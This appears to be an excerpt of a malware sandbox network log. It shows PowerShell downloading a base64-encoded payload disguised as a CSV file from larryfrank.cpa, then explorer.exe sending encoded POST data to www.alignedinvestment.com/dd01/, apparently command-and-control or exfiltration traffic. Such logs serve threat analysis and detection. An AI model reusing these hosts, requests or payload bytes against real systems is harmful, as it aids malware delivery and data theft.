                Jul 3, 2024 07:51:48.361525059 CEST192.168.2.71.1.1.10x4338Standard query (0)www.alignedinvestment.comA (IP address)IN (0x0001)false
                Jul 3, 2024 07:52:12.047447920 CEST192.168.2.71.1.1.10x948Standard query (0)www.yh-9.xyzA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 3, 2024 07:50:20.396856070 CEST1.1.1.1192.168.2.70x548dNo error (0)larryfrank.cpa178.128.157.150A (IP address)IN (0x0001)false
                Jul 3, 2024 07:51:48.418807030 CEST1.1.1.1192.168.2.70x4338No error (0)www.alignedinvestment.comalignedinvestment.comCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 07:51:48.418807030 CEST1.1.1.1192.168.2.70x4338No error (0)alignedinvestment.com46.23.69.44A (IP address)IN (0x0001)false
                • larryfrank.cpa
                • www.alignedinvestment.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.74970846.23.69.44804056C:\Windows\explorer.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 07:51:48.424608946 CEST174OUTGET /dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== HTTP/1.1
                Host: www.alignedinvestment.com
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.74970946.23.69.44804056C:\Windows\explorer.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 07:51:50.960834980 CEST12360OUTPOST /dd01/ HTTP/1.1
                Host: www.alignedinvestment.com
                Connection: close
                Content-Length: 144589
                Cache-Control: no-cache
                Origin: http://www.alignedinvestment.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://www.alignedinvestment.com/dd01/
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate
                Data Raw: 50 36 41 3d 4f 6d 76 78 46 53 6d 56 78 64 4e 57 36 4b 35 4a 68 7a 6a 72 35 5a 31 2d 67 76 7e 67 79 37 78 50 42 32 31 50 55 4a 43 4c 79 76 6f 78 4c 6b 4e 79 6c 63 57 5f 6f 6c 33 4a 38 35 59 41 6b 6e 49 44 53 5f 64 65 72 4c 73 6b 7e 75 74 51 50 6b 35 42 49 4c 76 68 62 67 4b 46 42 59 28 38 79 47 55 57 53 2d 7a 68 30 34 6d 31 43 67 54 50 34 32 48 71 53 50 6a 4b 69 35 33 44 73 66 63 77 39 69 51 33 6c 56 39 4d 4c 36 46 6c 49 36 69 37 49 6a 32 6c 67 56 75 67 55 46 43 6b 47 5a 31 38 58 33 78 73 53 61 4d 6a 52 57 37 42 31 4f 32 78 30 38 50 39 76 32 7e 43 48 6b 72 63 4d 4a 4b 6d 6a 68 76 4e 31 57 59 48 56 46 53 72 45 64 6b 2d 33 30 69 7a 7a 64 71 71 6d 5a 34 44 48 52 53 48 69 46 43 75 74 4c 43 7a 50 6a 56 47 78 6b 68 58 49 5a 28 5f 55 2d 51 5f 75 4c 47 43 38 68 76 34 33 61 6a 68 54 64 34 30 71 4b 6d 38 69 50 28 4a 33 68 4f 4b 45 5f 41 67 56 79 62 4f 4b 71 39 65 6c 34 51 50 36 51 39 48 52 4c 77 6d 55 4d 66 6b 6c 5a 28 6b 58 45 64 51 35 50 73 30 4f 33 42 35 74 65 31 45 75 34 6d 39 33 47 66 35 35 34 48 45 37 6b [TRUNCATED]
                Data Ascii: P6A=OmvxFSmVxdNW6K5Jhzjr5Z1-gv~gy7xPB21PUJCLyvoxLkNylcW_ol3J85YAknIDS_derLsk~utQPk5BILvhbgKFBY(8yGUWS-zh04m1CgTP42HqSPjKi53Dsfcw9iQ3lV9ML6FlI6i7Ij2lgVugUFCkGZ18X3xsSaMjRW7B1O2x08P9v2~CHkrcMJKmjhvN1WYHVFSrEdk-30izzdqqmZ4DHRSHiFCutLCzPjVGxkhXIZ(_U-Q_uLGC8hv43ajhTd40qKm8iP(J3hOKE_AgVybOKq9el4QP6Q9HRLwmUMfklZ(kXEdQ5Ps0O3B5te1Eu4m93Gf554HE7k9Z9c(y~MBgEFIDHSBBLN0ciVyMuMlcZxfkbu(Q5ZSCLDhxNjLSyj~c9vK3gCqUiPjf~1ijsc3d86bIvhH1IENdF_3ss6wsfY6x6dRaUBQI0rd-Q1u1oGiTMV(PFwUfnu3uOw9SJ0T4M2wtgnf1KgkWB3JcoYEApX410uAkxBCGKK3PYyQFe81cxFnnvMTAhBWfJ_YjX2FLRQBcV-RPZBeWjBRlRmp5XOOmnJfamy3h0pEdIzReZ2hjXbqJ(Z9NwReBkBDDeHTrOCNg5kshD0fVAhZNL-qhsrhzztEO0aTndWV7dyKmVb85OM(XGLHbGoTe5fl9vwRNaRM5FAZXhdBH11LYR3BImHWjaK(Z(kNuo3BP~_bYsDRTxaSe3RwUO8iZQVaK2-pbcKpWnZQWtQiGsxCl6HypDAonCpFmAli1Kqu5nZO1Vr6GhoSIsZ59a44ZIVrIIuAhacuDqWXVY0yUmSCu~5~30yLa3kf-fLpZipLHsCsyiRpxUqPNaD2i~SYe1yB8DPaEJ0R-DAkodB76VBJkPGEtXAtrfxlKimp3E6vyNwU1eZE43WGc3XbKIUPxSt7ETgHC19rrDTEWdyYBaGuLqqk-4dw1WlVa4V0uQQDcQG2fpqy8(IRhAIumVp2d1J0E4PqGmA9SXszr~BaMA9t3IdjIpIX8 [TRUNCATED]
                Jul 3, 2024 07:51:50.965837002 CEST2472OUTData Raw: 66 33 41 37 45 63 77 6d 74 6c 50 32 62 5a 69 75 70 62 6b 44 74 46 69 66 65 6e 33 30 43 4f 4e 74 67 78 72 48 59 44 52 4b 39 58 47 50 47 75 34 55 4a 44 52 58 53 55 6c 6f 7a 44 63 4e 58 53 52 63 49 6f 46 6c 77 48 4f 4d 35 49 69 54 44 55 50 34 79 5a
                Data Ascii: f3A7EcwmtlP2bZiupbkDtFifen30CONtgxrHYDRK9XGPGu4UJDRXSUlozDcNXSRcIoFlwHOM5IiTDUP4yZUqR33l074Y0O(Pe-5akktpgUDKUdQiSlOxJJgC3bMxkFv3QYQgOJwRInVgjbtEy_PEjkKsWJ~oTrGvcX9NEA5R0emHqwH5maa8dWC2qkAsDPFLSZ8deidwzlBL3cHyw3kOHx~-VRS5Qi8oFFwvQPWLbMNAWFDUgOZ
                Jul 3, 2024 07:51:50.965876102 CEST4944OUTData Raw: 30 66 36 65 4a 70 74 6b 4e 4b 56 33 30 46 6e 68 49 33 62 39 73 4f 59 79 53 42 6d 4b 32 47 63 79 57 56 4f 6e 4d 51 33 49 55 31 4c 30 37 62 57 32 33 6a 4a 53 38 45 7e 70 33 49 30 49 41 6e 38 66 62 4b 62 53 72 6f 79 57 76 55 49 38 78 6d 34 52 42 44
                Data Ascii: 0f6eJptkNKV30FnhI3b9sOYySBmK2GcyWVOnMQ3IU1L07bW23jJS8E~p3I0IAn8fbKbSroyWvUI8xm4RBDWv5inSIDSjBkw-XZ85YTQ9qqh2yQnuA5~-IWnJM11TllTVmUkhLT5IaO3ltqdwM0KzX3NZHDhKXXqUp3BvmBHmpiWOJE4jSETNujWY7sak8LFjbpgIjlYWfCwDGWME5Ng9RWH4y7qkqkYTS3~BXYjYLeSVzje_wlD
                Jul 3, 2024 07:51:50.965893984 CEST2472OUTData Raw: 45 6f 62 65 71 6e 7a 71 48 73 73 30 49 4b 42 38 57 73 6e 4c 28 41 56 39 48 2d 48 6f 49 39 64 77 72 38 57 4d 4a 52 62 42 6d 67 49 78 34 61 30 37 55 37 4d 47 61 6a 46 45 51 52 35 78 53 7a 4c 49 56 47 34 73 4e 62 37 4f 6d 69 31 4d 77 6d 67 34 38 4d
                Data Ascii: EobeqnzqHss0IKB8WsnL(AV9H-HoI9dwr8WMJRbBmgIx4a07U7MGajFEQR5xSzLIVG4sNb7Omi1Mwmg48Mg3(BUOCBkAYtieHAxd8EHImrF5nZZWr1rn3SmFRVtnpIaLL5iAqgQuF3~QjfWg7GgnH8mpX2EKnZcigzqSzjlsrztXfWN9BnSGEZNGVnYP8tEDJON-5MSziUb-3WzrCJYUmznTHHgopaamvg8xsMpnXPCPyMTsGs7
                Jul 3, 2024 07:51:50.965933084 CEST4944OUTData Raw: 6f 30 39 4d 53 44 41 35 50 31 64 70 42 59 34 6b 38 73 7a 78 49 72 42 45 52 57 44 4d 48 67 4c 5f 77 5a 45 79 66 69 78 67 28 46 7e 71 55 48 77 5f 37 4c 37 6c 4b 79 47 75 56 34 6c 70 6c 33 41 46 32 47 32 41 73 39 47 6d 52 57 74 33 35 52 64 49 66 49
                Data Ascii: o09MSDA5P1dpBY4k8szxIrBERWDMHgL_wZEyfixg(F~qUHw_7L7lKyGuV4lpl3AF2G2As9GmRWt35RdIfITqqdSXr50FM4Ad~AlDqDzoqbqru0laGqPjZ5vA3r528UQ3i_XFb5RV9BgIYYsQkT8qtp1qtz(J4-UrpBpjaiI0nKABGYwvYzb_ggDVxx8mmxMEbOgw6IfWSxYj(U7GxYbw5mxunfoYskxs2X33rCajoa7DXptq37q
                Jul 3, 2024 07:51:50.965964079 CEST4944OUTData Raw: 56 52 66 4a 62 6b 37 57 75 34 33 49 46 6b 4e 71 61 50 54 76 59 61 42 46 73 73 39 6b 59 42 77 65 79 61 4c 4d 62 45 6d 4d 7e 5f 4a 44 76 52 4e 48 74 70 73 2d 71 47 4e 35 4d 31 30 78 79 65 47 55 42 43 74 37 4c 45 67 44 75 47 62 71 30 67 33 4f 78 5f
                Data Ascii: VRfJbk7Wu43IFkNqaPTvYaBFss9kYBweyaLMbEmM~_JDvRNHtps-qGN5M10xyeGUBCt7LEgDuGbq0g3Ox_gn2MaDDO49Xi7booopjQ1G4Li0uCP8BunQZ96fd7yJxuUSW8rc1IM84JOW~2S096wgbP2gvTxfIgDmLQJH3llhAKiIXAS2u3Oe4J0l50D5WU~4QuFU~N17B43uQ6IO9dTT7cM8r5IikptFWlohWThAg4OiVN0rYrR
                Jul 3, 2024 07:51:50.965991974 CEST4944OUTData Raw: 33 43 62 53 37 56 4c 44 55 4f 6b 66 4a 61 4d 46 7e 30 6b 73 4b 5f 7e 79 65 46 31 5a 32 31 74 49 55 46 6b 63 54 77 5a 35 75 36 5a 6b 68 50 30 5a 51 44 33 64 50 64 45 43 43 32 68 6c 53 33 35 77 38 48 61 42 4e 66 68 49 4a 48 77 36 79 7a 68 46 73 51
                Data Ascii: 3CbS7VLDUOkfJaMF~0ksK_~yeF1Z21tIUFkcTwZ5u6ZkhP0ZQD3dPdECC2hlS35w8HaBNfhIJHw6yzhFsQ05ntUkFuPAllZImyuVhoDimyALZd5NzsWMoSeEXwR4VQgweZYVvAyLivwFREtbODX_m30S35jGqytvEiYEuXCXAvr0EeJQ7mDzihnMlSwH9QDpQkRDLGFtqGEfhEzjkwiZ(bG2Ig3RaU1Z2xs7yBHlWmWXB702rmW
                Jul 3, 2024 07:51:50.970989943 CEST4944OUTData Raw: 37 4b 44 6c 57 59 34 6b 6d 39 59 66 61 70 7a 42 62 68 35 61 4f 73 4c 7a 68 38 50 37 57 42 59 6e 65 4a 79 42 42 71 78 6c 7a 69 76 34 51 6f 46 77 4a 45 74 63 32 42 55 4a 76 75 65 6d 72 75 42 61 7a 4e 33 36 31 4e 68 61 65 49 4d 4f 4b 6b 75 75 52 42
                Data Ascii: 7KDlWY4km9YfapzBbh5aOsLzh8P7WBYneJyBBqxlziv4QoFwJEtc2BUJvuemruBazN361NhaeIMOKkuuRB3oNAowo7EsIFzrlM9DDA(JxC93KNQ72ucfse7b6NEwFQm62XpE3nXNVYfRwoFR7LV6u78WF0vnNiEJ(XIomsvxCB9gDa5_Ap028LK7HzDqFu(YSHyorwY1qr1WMNySjex8wZTaSluEsW1152zhmKOQfDLuRfX-EhA
                Jul 3, 2024 07:51:50.971050978 CEST7416OUTData Raw: 75 39 43 79 62 4f 37 53 61 7a 7a 72 38 49 4b 79 54 62 38 39 78 52 4a 78 57 63 6f 38 56 54 65 59 66 79 65 61 6b 66 46 73 4e 6e 58 39 65 69 42 53 54 53 7a 65 4e 63 54 34 53 4d 63 4f 41 4c 37 5a 67 50 57 32 4f 35 39 67 28 5a 70 4c 36 62 35 38 45 4b
                Data Ascii: u9CybO7Sazzr8IKyTb89xRJxWco8VTeYfyeakfFsNnX9eiBSTSzeNcT4SMcOAL7ZgPW2O59g(ZpL6b58EK9NgP9bVz3Zqzhb~5NlHPH_8juqkcST1HijrYfcuSQxlNoNtrLwdYEl56lejnET15ElpTn-iJmDOU3U6HcReutGwhjg8EHUpmLjsL1dU8dEJi3qRVsvDWqliFUZoz4BweuX916CSSQJJZYwGvgTyIYk7WMfk1JCsrp
                Jul 3, 2024 07:51:50.971131086 CEST2472OUTData Raw: 49 4b 37 5f 34 51 6f 43 69 6d 4d 50 54 6c 77 4e 43 63 4b 73 6e 57 78 6f 47 61 4c 63 4d 71 47 75 46 53 43 52 63 30 41 71 79 4b 4f 6d 65 56 28 67 45 30 74 6f 71 7a 78 37 62 6a 50 57 70 53 53 39 6b 5a 37 50 43 55 32 70 47 63 36 37 37 66 7a 6f 79 64
                Data Ascii: IK7_4QoCimMPTlwNCcKsnWxoGaLcMqGuFSCRc0AqyKOmeV(gE0toqzx7bjPWpSS9kZ7PCU2pGc677fzoydD0bhMvU7oQ3mxf~Z~O4iwM9JNU6aWv0D(aMDYq8rXogFAv61ZOqfN1mJeKl_fjWcNh2TZCsrpocq0a8U7ScWhpc7UaMIGkL3WIQ9Pg2zGi9nri~aR_DGki2Ffv20uDOgo7880um0qtqSpodxefNsSOnRrMlrwwFPC
                Jul 3, 2024 07:51:51.015783072 CEST34608OUTData Raw: 65 4c 64 4a 63 74 35 50 41 36 44 4d 7a 37 66 57 57 65 6e 57 6c 55 71 36 6a 32 4b 69 48 4d 6e 6a 56 5a 54 4f 62 74 61 57 4c 69 36 49 43 63 64 5a 32 4b 65 72 43 59 71 37 37 74 71 68 6c 43 53 79 41 6e 62 76 57 2d 46 31 73 7a 49 49 56 73 75 59 76 6a
                Data Ascii: eLdJct5PA6DMz7fWWenWlUq6j2KiHMnjVZTObtaWLi6ICcdZ2KerCYq77tqhlCSyAnbvW-F1szIIVsuYvjRDCtNQpLeeRtLDtFZkMEBsEGnj~BIX7eXC4c7lHnDGS_~-uI2Wjtz6uc4Q64GmsFUdqRiDwWlVlmd3aghBr3MELRXQP_E7V6DOU0pAdFllPj02i9~SPQ(lluPBngM-o4k9~XmDO56WpmHnv7vkuq9SfcmV10SowEr


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749705178.128.157.1504437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-07-03 05:50:20 UTC169OUTGET /Negus85.csv HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: larryfrank.cpa
                Connection: Keep-Alive
                2024-07-03 05:50:21 UTC273INHTTP/1.1 200 OK
                Date: Wed, 03 Jul 2024 05:50:20 GMT
                Server: Apache
                Last-Modified: Tue, 02 Jul 2024 09:27:38 GMT
                Accept-Ranges: bytes
                Content-Length: 451232
                Cache-Control: max-age=0
                Expires: Wed, 03 Jul 2024 05:50:20 GMT
                Connection: close
                Content-Type: text/csv
                2024-07-03 05:50:21 UTC7919INData Raw: 36 77 4c 69 39 6e 45 42 6d 37 74 38 44 52 51 41 63 51 47 62 36 77 49 48 58 51 4e 63 4a 41 54 72 41 73 2f 6b 36 77 49 45 70 4c 6c 65 64 4a 39 6f 36 77 49 6c 39 65 73 43 34 35 4f 42 38 54 6f 4d 36 67 35 78 41 5a 76 72 41 68 5a 6b 67 66 46 6b 65 48 56 6d 36 77 4a 36 66 33 45 42 6d 2b 73 43 65 6e 64 78 41 5a 75 36 74 69 74 35 70 4f 73 43 4b 4c 66 72 41 6c 42 39 63 51 47 62 36 77 49 38 61 6a 48 4b 36 77 4c 70 49 2b 73 43 30 64 36 4a 46 41 76 72 41 71 48 41 36 77 4a 30 6e 64 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 49 36 68 4f 73 43 54 42 47 42 2b 55 53 46 70 41 4e 38 79 65 73 43 2f 76 44 72 41 67 32 59 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 36 77 4c 33 4a 75 73 43 6a 79 32 42 77 2b 77 64 59 77 4e 78 41 5a 74 78 41 5a 75 36 35 49 4c 54 64 75 73
                Data Ascii: 6wLi9nEBm7t8DRQAcQGb6wIHXQNcJATrAs/k6wIEpLledJ9o6wIl9esC45OB8ToM6g5xAZvrAhZkgfFkeHVm6wJ6f3EBm+sCendxAZu6tit5pOsCKLfrAlB9cQGb6wI8ajHK6wLpI+sC0d6JFAvrAqHA6wJ0ndHicQGbcQGbg8EE6wI6hOsCTBGB+USFpAN8yesC/vDrAg2Yi0QkBHEBm3EBm4nD6wL3JusCjy2Bw+wdYwNxAZtxAZu65ILTdus
                2024-07-03 05:50:21 UTC8000INData Raw: 69 69 7a 53 37 54 74 42 6e 4d 4d 50 65 5a 41 4d 6d 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 44 44 30 63 42 4e 44 37 77 43 34 33 39 53 54 39 47 48 41 51 7a 49 76 4d 4c 41 2f 59 38 43 44 64 6b 4d 66 38 68 68 65 67 43 43 2b 6d 52 51 6c 4b 79 54 51 4a 69 78 4d 6e 41 50 39 62 4a 51 70 4a 6a 6a 76 55 32 78 4d 6b 57 61 4f 70 65 43 2b 62 6b 67 32 47 36 74 70 65 69 57 51 73 57 2b 7a 63 75 67 4e 49 77 71 46 71 38 31 6a 63 34 7a 62 63 35 61 2f 46 43 34 36 62 42 62 45 2f 73 4c 50 73 63 41 38 6b 73 68 70 6f 68 71 4d 66 49 2f 5a 54 44 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 5a 31 64 78 35 77 72 55 5a 71 4f 49 32 64 6e 5a 7a 36 56 34 46 4b 50 43 59 67 31 54 53 30 59 33 69 6e 5a 4a 52 6d 78 39 2f 57 37 57 64 4c 47 4e 34 72 64 67 72 2b 7a 51 69 4f 71 4b 42 2f 4e 35 50
                Data Ascii: iizS7TtBnMMPeZAMm0WUww9FlMMPRZTDD0cBND7wC439ST9GHAQzIvMLA/Y8CDdkMf8hhegCC+mRQlKyTQJixMnAP9bJQpJjjvU2xMkWaOpeC+bkg2G6tpeiWQsW+zcugNIwqFq81jc4zbc5a/FC46bBbE/sLPscA8kshpohqMfI/ZTDD0WUww9FlMMPRZZ1dx5wrUZqOI2dnZz6V4FKPCYg1TS0Y3inZJRmx9/W7WdLGN4rdgr+zQiOqKB/N5P
                2024-07-03 05:50:21 UTC8000INData Raw: 66 73 50 4b 32 37 59 2f 54 4b 61 56 55 70 47 6c 48 47 44 36 78 39 2f 57 45 53 4a 36 30 35 44 54 6e 70 32 73 63 56 6f 48 64 58 67 65 37 51 52 32 57 57 76 48 6e 39 67 41 76 52 2f 72 6b 50 6f 42 69 70 4f 77 49 50 68 30 58 36 42 57 4d 6a 68 64 43 65 76 67 43 41 35 56 70 71 4f 39 5a 59 57 52 4d 7a 54 32 35 52 6d 5a 6b 4d 4d 4e 70 41 42 4c 71 62 57 43 56 42 74 46 75 50 38 50 47 74 6a 44 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 42 6c 31 77 36 4a 6c 61 4c 2f 4a 7a 50 57 30 31 4d 4e 54 58 44 54 4c 75 2f 61 6a 32 37 6b 55 50 4c 6a 51 57 44 78 46 69 66 4e 50 38 4c 44 6b 7a 44 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 42 61 32 50 63 5a 64 4e 38 6d 6a 4a 4e 61 34 49 66 43 30 57 56 59 2f 4f 63 44 61 30 4c 39 51 65 65 43 70 79 43 78 39 2f 55 55 6e 41 58 54 35 42
                Data Ascii: fsPK27Y/TKaVUpGlHGD6x9/WESJ605DTnp2scVoHdXge7QR2WWvHn9gAvR/rkPoBipOwIPh0X6BWMjhdCevgCA5VpqO9ZYWRMzT25RmZkMMNpABLqbWCVBtFuP8PGtjDD0WUww9FlMMPRZTBl1w6JlaL/JzPW01MNTXDTLu/aj27kUPLjQWDxFifNP8LDkzDD0WUww9FlMMPRZTBa2PcZdN8mjJNa4IfC0WVY/OcDa0L9QeeCpyCx9/UUnAXT5B
                2024-07-03 05:50:21 UTC8000INData Raw: 47 58 70 44 33 4d 34 33 39 44 4a 70 2f 77 32 35 4b 56 47 55 78 77 39 48 75 76 54 76 52 5a 54 42 35 54 63 42 68 45 44 6e 74 48 4d 66 52 4d 34 37 49 61 69 63 6b 51 69 63 61 44 78 72 39 35 4d 61 33 56 50 34 49 6b 45 33 73 30 38 4c 69 2b 46 62 36 47 52 63 79 6b 37 2f 46 71 37 59 7a 58 6f 76 41 71 73 31 58 44 66 51 79 6d 63 77 6c 6d 6e 42 58 45 69 39 41 6c 54 44 73 43 37 45 79 77 79 6c 53 46 76 39 55 4a 72 54 61 56 76 6f 4c 50 72 51 6e 6a 2b 79 31 78 39 42 6c 4d 4a 4e 70 56 55 6b 78 72 56 43 30 6e 44 70 69 42 58 66 32 66 45 75 52 54 65 7a 53 79 74 50 34 43 54 4b 74 59 79 4e 6a 56 34 53 76 6a 37 47 2b 45 76 4d 31 74 35 6c 75 65 38 31 31 53 69 45 6e 70 45 58 66 50 68 76 69 41 76 79 58 72 4f 71 42 36 2b 72 75 47 58 6e 4b 56 4b 31 71 52 77 4d 39 41 54 56 59 36 48
                Data Ascii: GXpD3M439DJp/w25KVGUxw9HuvTvRZTB5TcBhEDntHMfRM47IaickQicaDxr95Ma3VP4IkE3s08Li+Fb6GRcyk7/Fq7YzXovAqs1XDfQymcwlmnBXEi9AlTDsC7EywylSFv9UJrTaVvoLPrQnj+y1x9BlMJNpVUkxrVC0nDpiBXf2fEuRTezSytP4CTKtYyNjV4Svj7G+EvM1t5lue811SiEnpEXfPhviAvyXrOqB6+ruGXnKVK1qRwM9ATVY6H
                2024-07-03 05:50:21 UTC8000INData Raw: 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 78 7a 52 72 44 39 4b 59 4f 52 41 65 65 6e 6d 57 2f 55 4f 46 76 2b 4f 4b 53 69 7a 50 49 4d 7a 59 77 53 66 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 44 44 59 43 77 30 4d 49 48 49 63 47 51 68 6a 67 61 2b 44 45 7a 79 4f 6d 34 69 6b 33 70 59 47 56 4b 47 68 38 63 75 53 6f 4d 4a 67 71 51 35 67 53 54 48 30 65 79 74 55 39 42 6c 4d 4d 7a 68 45 68 44 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 44 44 63 45 4b 33 53 54 65 4d 34 52 57 66 52 56 72 78 6d 74 65 64 43 57 72 42 46 51 64 53 4e 49 6b 51 4a 57 74 62 51 69 43 43 68 6f 65 4a 35 4d 46 6a 34 79 38 44 53 73 41 6a 71 64 4f 31 4f 6a 30 57 54 6a 50 65 43 55 62 51 75 6a 70 4c 41 4d 6e 36 74 6d 35 64 48 73 49 38 73 54 44 37 2f 69 48 65 33 71 49 4f 41 74 46 6c 4d 4d 50 52 5a 54
                Data Ascii: D0WUww9FlMMPRxzRrD9KYORAeenmW/UOFv+OKSizPIMzYwSfD0WUww9FlMMPRZTDDYCw0MIHIcGQhjga+DEzyOm4ik3pYGVKGh8cuSoMJgqQ5gSTH0eytU9BlMMzhEhDD0WUww9FlMMPRZTDDcEK3STeM4RWfRVrxmtedCWrBFQdSNIkQJWtbQiCChoeJ5MFj4y8DSsAjqdO1Oj0WTjPeCUbQujpLAMn6tm5dHsI8sTD7/iHe3qIOAtFlMMPRZT
                2024-07-03 05:50:21 UTC8000INData Raw: 6a 30 72 4b 2f 4b 6a 4a 74 6f 34 4b 50 6d 67 4e 4b 5a 44 67 79 77 39 48 73 39 70 56 61 30 47 33 42 30 57 58 59 54 79 68 6c 4d 4d 7a 52 63 52 54 44 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 44 44 65 6a 72 66 56 50 71 62 59 61 7a 5a 38 68 48 36 73 53 30 48 6a 30 74 72 37 57 61 79 67 37 48 66 51 74 43 31 45 64 37 68 71 73 44 52 5a 66 7a 77 37 54 2b 55 68 65 4f 5a 30 53 31 63 4f 76 46 44 78 7a 2b 42 56 75 48 50 43 45 6f 43 71 52 42 42 32 33 78 6d 65 71 61 4d 76 75 37 48 52 32 50 44 57 57 4b 6e 34 59 6f 33 2b 49 66 51 72 76 64 47 39 32 63 77 77 35 46 75 34 6c 43 43 33 76 71 75 54 2f 79 78 4d 4a 57 64 6c 69 31 51 6c 6b 68 6f 72 59 32 78 4b 46 4c 34 73 31 6c 51 6c 73 32 56 45 57 47 35 38 4d 2b 30 62 76 47 31 41 6f 54 47 6e 6f 54 70 74 4c 63 65 4d 32 43 51 6c 51
                Data Ascii: j0rK/KjJto4KPmgNKZDgyw9Hs9pVa0G3B0WXYTyhlMMzRcRTD0WUww9FlMMPRZTDDejrfVPqbYazZ8hH6sS0Hj0tr7Wayg7HfQtC1Ed7hqsDRZfzw7T+UheOZ0S1cOvFDxz+BVuHPCEoCqRBB23xmeqaMvu7HR2PDWWKn4Yo3+IfQrvdG92cww5Fu4lCC3vquT/yxMJWdli1QlkhorY2xKFL4s1lQls2VEWG58M+0bvG1AoTGnoTptLceM2CQlQ
                2024-07-03 05:50:21 UTC8000INData Raw: 43 4f 47 45 69 62 51 48 6b 77 53 65 4b 2b 6c 78 43 49 4f 50 68 53 2f 6a 73 41 64 38 38 43 30 71 65 6d 58 71 42 41 61 36 72 36 49 46 39 46 36 53 63 73 7a 77 4a 56 71 39 6b 4d 4d 4e 61 38 45 37 43 30 57 55 2f 52 30 52 6e 4d 4d 50 65 6f 67 6e 63 30 57 55 77 77 39 46 6c 4d 4d 50 52 5a 54 44 44 30 64 4f 31 57 61 31 72 6f 61 61 74 74 72 70 55 65 4d 68 64 37 74 78 7a 33 42 5a 72 4e 4e 43 48 6d 42 6a 30 4a 70 4b 56 6e 64 47 56 32 58 75 65 73 47 57 35 45 39 43 74 65 45 70 73 62 7a 4c 44 30 64 70 68 5a 78 68 64 2f 46 52 66 33 35 44 5a 79 68 56 76 32 6f 4e 48 6a 55 63 62 71 65 42 69 74 6d 63 6d 75 76 79 42 6b 41 63 4b 37 58 36 79 48 56 7a 42 51 69 62 70 55 43 68 74 4e 49 6d 70 47 6a 30 6c 51 6a 67 32 4c 70 48 4b 35 4d 46 2b 6c 4e 69 63 51 69 44 34 4c 6e 69 48 37 43
                Data Ascii: COGEibQHkwSeK+lxCIOPhS/jsAd88C0qemXqBAa6r6IF9F6ScszwJVq9kMMNa8E7C0WU/R0RnMMPeognc0WUww9FlMMPRZTDD0dO1Wa1roaattrpUeMhd7txz3BZrNNCHmBj0JpKVndGV2XuesGW5E9CteEpsbzLD0dphZxhd/FRf35DZyhVv2oNHjUcbqeBitmcmuvyBkAcK7X6yHVzBQibpUChtNImpGj0lQjg2LpHK5MF+lNicQiD4LniH7C
                2024-07-03 05:50:21 UTC8000INData Raw: 47 43 7a 6f 4a 43 34 75 4e 37 67 6e 53 5a 54 2f 44 44 2f 34 77 77 39 46 6c 4d 4d 50 52 5a 54 44 44 30 57 55 77 61 76 4f 73 78 4a 7a 75 53 34 7a 31 34 7a 46 6a 47 35 66 74 39 34 32 42 6f 4c 36 4d 59 63 4c 37 6b 32 6d 4e 62 46 6d 4c 55 4f 2b 62 49 6e 59 46 57 79 63 4d 65 55 72 52 6e 5a 32 63 59 30 41 2b 56 52 65 43 66 36 72 65 57 56 59 6a 65 74 37 36 79 54 72 43 68 36 4f 34 55 31 73 32 2b 4f 4b 4f 4d 68 70 48 49 42 77 2b 69 74 41 52 6f 72 31 6f 71 39 45 31 4d 4d 4d 35 52 64 72 41 30 65 79 6c 72 74 4e 6c 4d 45 6f 54 71 64 47 32 79 70 64 72 6e 79 2b 68 32 49 71 76 53 51 63 6c 30 68 4f 64 65 48 76 54 7a 4d 35 58 54 68 4d 73 71 45 79 55 2f 78 42 37 74 59 73 43 41 2b 52 2f 66 65 53 54 50 72 54 48 59 6b 68 45 43 44 4c 44 30 59 33 31 56 74 4e 6c 57 4a 67 54 69 4a
                Data Ascii: GCzoJC4uN7gnSZT/DD/4ww9FlMMPRZTDD0WUwavOsxJzuS4z14zFjG5ft942BoL6MYcL7k2mNbFmLUO+bInYFWycMeUrRnZ2cY0A+VReCf6reWVYjet76yTrCh6O4U1s2+OKOMhpHIBw+itARor1oq9E1MMM5RdrA0eylrtNlMEoTqdG2ypdrny+h2IqvSQcl0hOdeHvTzM5XThMsqEyU/xB7tYsCA+R/feSTPrTHYkhECDLD0Y31VtNlWJgTiJ
